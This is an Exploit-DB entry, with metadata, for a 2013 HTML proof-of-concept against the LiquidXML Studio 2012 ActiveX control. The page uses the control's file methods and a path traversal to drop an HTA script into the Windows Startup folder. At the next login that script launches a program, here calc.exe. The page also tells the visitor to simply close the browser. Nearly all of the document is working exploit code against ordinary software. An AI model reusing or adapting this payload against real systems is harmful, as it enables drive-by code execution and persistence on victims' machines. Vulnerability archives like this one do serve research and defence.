EXPLOITS

LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation

Author: Dr_IDE
type: local
platform: windows
port: 
date_added: 2013-03-25  
date_updated: 2013-03-25  
verified: 1  
codes: OSVDB-91662  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-03-25-at-92201-am.png  
application_url:   

raw file: 24884.html  

<html>
<object classid='clsid:8AEEAB4A-E1DA-4354-B800-8F0B553770E1' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {8AEEAB4A-E1DA-4354-B800-8F0B553770E1}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Nothing to see here, you can close the browser now...
</body>
</html>